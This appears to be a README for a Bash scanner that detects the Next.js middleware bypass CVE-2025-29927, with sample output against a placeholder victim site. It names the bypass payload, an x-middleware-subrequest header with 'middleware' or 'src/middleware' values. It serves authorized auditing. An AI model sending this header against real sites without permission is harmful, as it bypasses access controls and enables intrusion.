基于 Zhero Web Security 研究的 Bash 自动化工具,用于检测存在 中间件绕过 漏洞(CVE-2025-29927)的 Next.js 应用。
bashwhatwebcurl在 Debian/Ubuntu 上安装:
sudo apt install whatweb curl
./CVE-2025-29927.sh -u https://example.com
创建一个 urls.txt 文件,每行一个 URL:
https://target1.com
https://target2.com
执行:
./nextjs_bypass_checker_v2.sh -l urls.txt
识别 Next.js
whatweb 检测技术栈。/_next/static/BUILD_ID 和 _buildManifest.js。中间件检测
X-Middleware-RewriteX-Middleware-Set-Cookie绕过测试
x-middleware-subrequest 的请求并检测头部。[*] Analizando: https://victima.com
[+] WhatWeb:
-> Detectado: Next.js[12.2.0]
[+] BUILD_ID: 3fjd92hf8
[+] Versión detectada: 12.2.0
[+] Middleware activo (cabeceras detectadas):
X-Middleware-Rewrite: /not-found/locale=en
[+] Probando exploits:
-> x-middleware-subrequest: middleware -> ✅ BYPASS EXITOSO (cabeceras desaparecieron)
-> x-middleware-subrequest: src/middleware -> ❌ Middleware no evadido
[*] Finalizado: https://victima.com
此脚本仅供教育用途及授权审计使用。 请勿将其用于未经授权的目标。滥用可能导致非法行为。
基于以下研究: Zhero Web Security